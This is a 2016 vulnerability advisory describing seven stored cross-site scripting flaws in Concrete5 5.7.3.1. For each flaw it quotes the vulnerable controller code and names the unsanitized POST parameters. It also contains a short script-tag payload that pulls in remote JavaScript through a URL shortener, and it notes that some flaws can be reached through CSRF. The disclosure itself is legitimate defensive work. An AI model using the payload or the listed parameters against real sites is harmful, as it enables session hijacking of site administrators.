-------------------------------------------------------------------------
Concrete5 <= 5.7.3.1 Multiple Stored Cross-Site Scripting Vulnerabilities
-------------------------------------------------------------------------


[-] Software Link:

https://www.concrete5.org/


[-] Affected Versions:

Version 5.7.3.1 and probably other versions.


[-] Vulnerabilities Description:

1) User input passed through the "uEmail" and "uDefaultLanguage" POST parameters when registering
a new account is not properly sanitized before being used to generate HTML output. This can be
exploited by unauthenticated attackers to permanently store arbitrary script code within the Users
database table, which might be executed by an authenticated user while browsing to the users page.

NOTE: the "uDefaultLanguage" parameter cannot be longer than 32 characters, however this can
still be exploited by e.g. using a URL shortener service to include arbitrary script code (such
as <script src=//v.ht/x_s></script> which is exactly 32 characters).

2) The vulnerable code is located in /concrete/controllers/single_page/dashboard/system/registration/open.php:

13.  public function update_registration_type()
14.  {
15.      if ($this->isPost()) {
16.          Config::save('concrete.user.registration.email_registration', ($this->post('email_as_username') ? true : false));
17.          Config::save('concrete.user.registration.type', $this->post('registration_type'));
18.          Config::save('concrete.user.registration.captcha', ($this->post('enable_registration_captcha')) ? true : false);
19.          switch ($this->post('registration_type')) {
20.              case "enabled":
21.                  Config::save('concrete.user.registration.enabled', true);
22.                  Config::save('concrete.user.registration.validate_email', false);
23.                  Config::save('concrete.user.registration.approval', false);
24.                  Config::save('concrete.user.registration.notification', $this->post('register_notification'));
25.                  Config::save(
26.                      'concrete.user.registration.notification_email',
27.                      Loader::helper('security')->sanitizeString(
28.                          $this->post('register_notification_email')));

User input passed through the "register_notification_email" POST parameter is not properly sanitized
before being stored into a configuration setting (the "sanitizeString()" method strips tags from the
string but not double quotes). This can be exploited by an authenticated attacker to permanently
store arbitrary script code within the database, which might be executed by another user while
browsing to the "Public Registration Settings" page.

NOTE: the vulnerability can be exploited only by authenticated users, however an attacker
can leverage a CSRF vulnerability related to the "Public Registration Settings" page.

3) The vulnerable code is located in /concrete/controllers/single_page/dashboard/system/registration/profiles.php:

11.  public function update_profiles() {
12.      if ($this->isPost()) {
13.          Config::save('concrete.user.profiles_enabled', ($this->post('public_profiles')?true:false));
14.          Config::save('concrete.user.gravatar.enabled', ($this->post('gravatar_fallback')?true:false));
15.          Config::save('concrete.user.gravatar.max_level', Loader::helper('security')->sanitizeString($this->post('gravatar_max_level')));
16.          Config::save('concrete.user.gravatar.image_set', Loader::helper('security')->sanitizeString($this->post('gravatar_image_set')));
17.          // $message = ($this->post('public_profiles')?t('Public profiles have been enabled'):t('Public profiles have been disabled.'));
18.          if($this->post('public_profiles')) {
19.              $this->redirect('/dashboard/system/registration/profiles/profiles_enabled');

User input passed through the "gravatar_max_level" e "gravatar_image_set" POST parameters is not
properly sanitized before being stored into a configuration setting (the "sanitizeString()" method
strips tags from the string but not double quotes). This can be exploited by an authenticated attacker
to permanently store arbitrary script code within the database, which might be executed by another
user while browsing to the "Public Profiles Settings" page.

NOTE: the vulnerability can be exploited only by authenticated users, however an attacker
can leverage a CSRF vulnerability related to the "Public Profiles Settings" page.

4) The vulnerable code is located in /concrete/controllers/single_page/dashboard/users/points/actions.php:

94.  public function save()
95.  {
96.      if($this->post('upaID') > 0) {
97.          $this->upa->load($this->post('upaID'));
98.          if (!$this->upa->hasCustomClass()) {
99.              $this->upa->upaHandle = $this->post('upaHandle');
100.          }
101.          $this->upa->upaName = $this->post('upaName');
102.          $this->upa->upaDefaultPoints = $this->post('upaDefaultPoints');
103.          $this->upa->gBadgeID = $this->post('gBadgeID');
104.          if (!$this->upa->pkgID) {
105.              // i hate this activerecord crap
106.              $this->upa->pkgID = 0;
107.          }
108.          $this->upa->upaIsActive = 0;
109.          if ($this->post('upaIsActive')) {
110.              $this->upa->upaIsActive = 1;
111.          }
112.  
113.          $this->upa->save();
114.      } else {
115.          $upa = UserPointAction::add($this->post('upaHandle'), $this->post('upaName'), $this->post('upaDefaultPoints'), $this->post('gBadgeID'), $this->post('upaIsActive'));
116.      }

User input passed through the "upaHandle" and "upaName" POST parameters is not properly sanitized
before being stored. This can be exploited by an authenticated attacker to permanently store
arbitrary script code within the database, which might be executed by another user while browsing
to the "Community Points Actions" page.

NOTE: the vulnerability can be exploited only by authenticated users, however an attacker
can leverage a CSRF vulnerability related to the "Community Points Actions" page.

5) The vulnerable code is located in /concrete/elements/files/add_to_sets.php:

110.  if ($_POST['fsNew']) {
111.      $type = ($_POST['fsNewShare'] == 1) ? FileSet::TYPE_PUBLIC : FileSet::TYPE_PRIVATE;
112.      $fs = FileSet::createAndGetSet($_POST['fsNewText'], $type);
113.      //print_r($fs);

User input passed through the "fsNewText" POST parameter is not properly sanitized before being stored.
This can be exploited by an authenticated attacker to permanently store arbitrary script code within the
database, which might be executed by another user while browsing to the "Add to New Set" panel.

NOTE: the vulnerability can be exploited only by authenticated users, however an attacker
can leverage a CSRF vulnerability related to the "File Manager" page.

6) The vulnerable code is located in /concrete/controllers/single_page/dashboard/extend/connect.php:

18.  public function connect_complete() {
19.      $tp = new TaskPermission();
20.      if ($tp->canInstallPackages()) {
21.          if (!$_POST['csToken']) {
22.              $this->set('error', array(t('An unexpected error occurred when connecting your site to the marketplace.')));
23.          } else {
24.              $config = \Core::make('config/database');
25.              $config->save('concrete.marketplace.token', $_POST['csToken']);
26.              $config->save('concrete.marketplace.url_token', $_POST['csURLToken']);

User input passed through the "csToken" and "csURLToken" POST parameters is not properly sanitized
before being stored into a configuration setting. This can be exploited by an authenticated attacker
to permanently store arbitrary script code within the database, which might be executed by another
user while browsing to the "Extend Concrete5" pages.

NOTE: the vulnerability can be exploited only by authenticated users, however an attacker
can leverage a CSRF vulnerability related to the "Community Connect" page.

7) The vulnerable code is located in /concrete/controllers/single_page/dashboard/system/multilingual/translate_interface.php:

110.  public function save_translation()
111.  {
112.      $mtID = intval($this->post('mtID'));
113.      $translation = Translation::getByID($mtID);
114.      if (is_object($translation)) {
115.          $translation->updateTranslation($this->post('msgstr'));
116.      }

User input passed through the "msgstr" POST parameter is not properly sanitized before being stored.
This can be exploited by an authenticated attacker to permanently store arbitrary script code within the
database, which might be executed by another user while browsing to the "Translate Site Interface" page.

NOTE: the vulnerability can be exploited only by authenticated users, however an attacker
can leverage a CSRF vulnerability related to the "Translate Site Interface" page.


[-] Solution:

Update to a fixed version.


[-] Disclosure Timeline:

[05/05/2015] - Vulnerabilities details sent through HackerOne
[02/10/2015] - CVE number requested
[28/12/2015] - Vendor said the vulnerabilities should be fixed in the upstream
[26/06/2016] - Vulnerabilities publicly disclosed on HackerOne
[28/06/2016] - Publication of this advisory


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has not assigned a CVE identifier for these vulnerabilities.


[-] Credits:

Vulnerabilities discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2016-09


[-] Other References:

https://hackerone.com/reports/59662